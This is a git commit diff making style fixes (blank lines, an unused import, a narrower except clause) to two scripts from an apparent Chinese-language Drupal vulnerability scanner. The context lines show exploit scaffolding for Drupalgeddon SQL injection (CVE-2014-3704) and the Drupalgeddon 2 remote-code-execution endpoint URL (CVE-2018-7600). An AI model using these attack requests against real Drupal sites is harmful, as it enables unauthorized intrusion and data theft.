fix

2019-08-20 19:05:52 +08:00
parent 6f80af9399
commit a55b0dc3e9
2 changed files with 13 additions and 12 deletions
--- a/durpal/CVE_2014_3704.py
+++ b/durpal/CVE_2014_3704.py
@@ -1,8 +1,6 @@
 # -*- coding: utf-8 -*-
-
 from bs4 import BeautifulSoup
 import requests
-import re

 '''
 Usage:
@@ -10,6 +8,7 @@ Usage:
    Drupal < 7.32 “Drupalgeddon” SQL注入漏洞（CVE-2014-3704）
 '''

+
 def attack(URL):
    url = URL+'/?q=node&destination=node'
    print('[+]开始检测-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞（CVE-2014-3704）。[+]')
@@ -26,11 +25,11 @@ def attack(URL):
        print('--------------------')
        print(str(soup.find_all('li')[2])[100:135])#截取注入结果的那一段字符出来
        print('--------------------')
-    except:
+    except Exception:
        print('someerror!')
    print('[+]检测结束-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞（CVE-2014-3704）。[+]')
    print('\n')

+
 if __name__ == "__main__":
    attack()
-
--- a/durpal/CVE_2018_7600.py
+++ b/durpal/CVE_2018_7600.py
@@ -7,6 +7,8 @@ Usage:
    moon.py -u  drupal http://127.0.0.1:8080
    Drupal Drupalgeddon 2远程代码执行漏洞（CVE-2018-7600）
 '''
+
+
 def attack(URL):
    print('[+]开始检测-Drupal Drupalgeddon 2远程代码执行漏洞（CVE-2018-7600）。[+]')
    url = URL + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'